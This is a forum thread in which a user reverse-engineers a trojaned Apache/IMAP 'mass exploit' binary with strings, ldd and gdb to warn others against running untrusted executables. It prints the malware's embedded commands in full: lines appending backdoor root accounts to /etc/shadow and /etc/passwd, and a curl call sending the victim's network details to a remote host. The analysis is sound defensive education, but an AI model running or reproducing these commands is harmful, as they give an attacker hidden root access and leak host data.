PDA

View Full Version : Watch what you trust.


evilghost
08-28-07, 11:56 AM
This event struck me as unusual so I wanted to share with you why it's normal to be paranoid.

While reading up on my RSS security feeds I found a notification about exploitation of Apache/IMAP, with a link on Security Focus.

http://www.securityfocus.com/archive/1/477926/30/0/threaded

The grammatic structure of the message appears odd to say the least. Checking out the site there are two gzipped tarballs available for download. One includes the source code as well as a binary, the other is just precompiled binaries.

I wanted to show you how you can use the 'strings' command and 'ldd' to find information about an executable. Before you run an untrusted executable, especially as root, you better know for darn sure what it is.

ldd will list libraries a dynamic executable is compiled against, in this case, the executable wasn't statically compiled.

luser@meowbox:~/Desktop$ ldd massxpl
linux-gate.so.1 => (0xffffe000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e10000)
/lib/ld-linux.so.2 (0xb7f4f000)


Now, look what strings has to say:


luser@meowbox:~/Desktop$ strings massxpl
/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
recv
connect
snprintf
fgets
puts
getuid
system
socket
select
send
strstr
bcopy
memset
gethostbyname
fclose
getpeername
htons
exit
fopen
_IO_stdin_used
__libc_start_main
fcntl
GLIBC_2.1
GLIBC_2.0
PTRh
Mass Xploitz for Apache and Imap
Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL
Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3
Attacking IMAP server on %s...
Press CTRL+C if you want to skip exploit
./xpl/imapfc3 -h %s
Attacking apache server on %s...
./xpl/apache -t 0 -h %s
perl ./xpl/apache.pl %s 1
./xpl/apache -t 1 -h %s
perl ./xpl/apache.pl %s 2
./xpl/apache -t 2 -h %s
perl ./xpl/apache.pl %s 3
./xpl/apache -t 3 -h %s
socket creation error
can not find host
[ %s ] Port %d (TCP) tertutup
[ %s ] Port %d (TCP) terbuka
Checking for banner...
HEAD / HTTP/1.1
Host:%s
pache
IMAP4rev1
Root priviledge is needed - use your root user OK!
target.txt
Rename your target list filename to target.txt
/etc/shadow
newbie:$1$nLv4Q0aJ$rV4IkBgFH1NMo/HzHX35u/
echo toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadowecho newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow
echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd
echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd
/usr/bin/curl
/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null
Trying to connect to %s port %d


As you can plainly see, the binary wants you to run it as root. When you do, it adds two new users to your /etc/shadow file (newbie and toor) and then to your /etc/password file. It then connects to a HTTP server using curl and reports your IP addresses so the malware author can then come back and connect to you. (http://www.trancefix.org/hell/save.php)

This is poor quality code. Several assumptions are made. Curl exists on the system and ifconfig will return a non IANA reserved address.

Either way, this should serve as a wake up call, malware authors are everywhere, and they're actively trying to compromise your box. If you're not taking necessary caution you'll get owned.

Even if you don't know C read the source code, unless it's marvelously obfuscated, you should be able to pick out oddities. Don't trust precompiled binaries from untrusted sources.

spaceigg
08-28-07, 12:11 PM
interesting. thanks for educating us

evilghost
08-28-07, 12:13 PM
You can also use gdb (GNU Debugger) to analyze the executable.

Run "gdb"
Type "file /path/to/massxpl"
Type "disass main" to run the disassembler on the application

Look for the movl calls, they occur around 0x80494e0 and 0x8049534

Type "x/s [address]" and you'll see:


(gdb) x/s 0x80494e0
0x80494e0 <__dso_handle+816>: "echo toor:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>: "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"

evilghost
08-28-07, 12:21 PM
When disassembling, these are the things to look for, note the system calls:


0x08048feb <main+262>: call 0x8048628 <system@plt>
0x08048ff0 <main+267>: movl $0x8049534,(%esp)
0x08048ff7 <main+274>: call 0x8048628 <system@plt>
0x08048ffc <main+279>: movl $0x8049588,(%esp)
0x08049003 <main+286>: call 0x8048628 <system@plt>
0x08049008 <main+291>: movl $0x80495bc,(%esp)
0x0804900f <main+298>: call 0x8048628 <system@plt>
0x08049014 <main+303>: movl $0x8049468,0x4(%esp)


And now, what they do:


(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>: "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>: "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049588
0x8049588 <__dso_handle+984>: "echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd"
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>: "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x804960c
0x804960c <__dso_handle+1116>: "/usr/bin/curl -d \"user=newbie&pass=novice&target=$(ifconfig -a)\" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null"

evilghost
08-28-07, 01:14 PM
You can also use gdb to list the functions of the program and then disassemble and inspect certain aspects of that function.


(gdb) info functions
All defined functions:

Non-debugging symbols:
0x080485d0 _init
0x080485f8 close@plt
0x08048608 select@plt
0x08048618 bcopy@plt
0x08048628 system@plt
0x08048638 puts@plt
0x08048648 getpeername@plt
0x08048658 fgets@plt
0x08048668 strstr@plt
0x08048678 __libc_start_main@plt
0x08048688 printf@plt
0x08048698 getuid@plt
0x080486a8 fcntl@plt
0x080486b8 fclose@plt
0x080486c8 snprintf@plt
0x080486d8 gethostbyname@plt
0x080486e8 exit@plt
0x080486f8 send@plt
0x08048708 htons@plt
0x08048718 memset@plt
---Type <return> to continue, or q <return> to quit---
0x08048728 connect@plt
0x08048738 fopen@plt
0x08048748 recv@plt
0x08048758 socket@plt
0x08048768 __gmon_start__@plt
0x08048780 _start
0x080487a4 call_gmon_start
0x080487d0 __do_global_dtors_aux
0x08048800 frame_dummy
0x08048824 promosi
0x08048850 imapattack
0x080488a7 apacheattack
0x08048ac8 ctimeout
0x08048ca0 bannertest
0x08048ee5 main
0x08049104 __libc_csu_fini
0x0804910c __libc_csu_init
0x08049160 __do_global_ctors_aux
0x0804918c _fini
(gdb) disass fopen
No symbol table is loaded. Use the "file" command.
(gdb) disass fopen\@plt
No symbol table is loaded. Use the "file" command.
(gdb) disass promosi
Dump of assembler code for function promosi:
0x08048824 <promosi+0>: push %ebp
0x08048825 <promosi+1>: mov %esp,%ebp
0x08048827 <promosi+3>: sub $0x8,%esp
0x0804882a <promosi+6>: movl $0x80491b4,(%esp)
0x08048831 <promosi+13>: call 0x8048638 <puts@plt>
0x08048836 <promosi+18>: movl $0x80491d8,(%esp)
0x0804883d <promosi+25>: call 0x8048638 <puts@plt>
0x08048842 <promosi+30>: movl $0x8049218,(%esp)
0x08048849 <promosi+37>: call 0x8048638 <puts@plt>
0x0804884e <promosi+42>: leave
0x0804884f <promosi+43>: ret
End of assembler dump.
(gdb) x/s 0x80491d8
0x80491d8 <__dso_handle+40>: "Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL"
(gdb) x/s 0x8049218
0x8049218 <__dso_handle+104>: "Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3\n\n"
(gdb)

wnd
09-04-07, 06:31 AM
Somehow your post reminded me about Ken Thompson's article on Reflections on Trusting Trust (http://cm.bell-labs.com/who/ken/trust.html). "The moral is obvious. You can't trust code that you did not totally create yourself."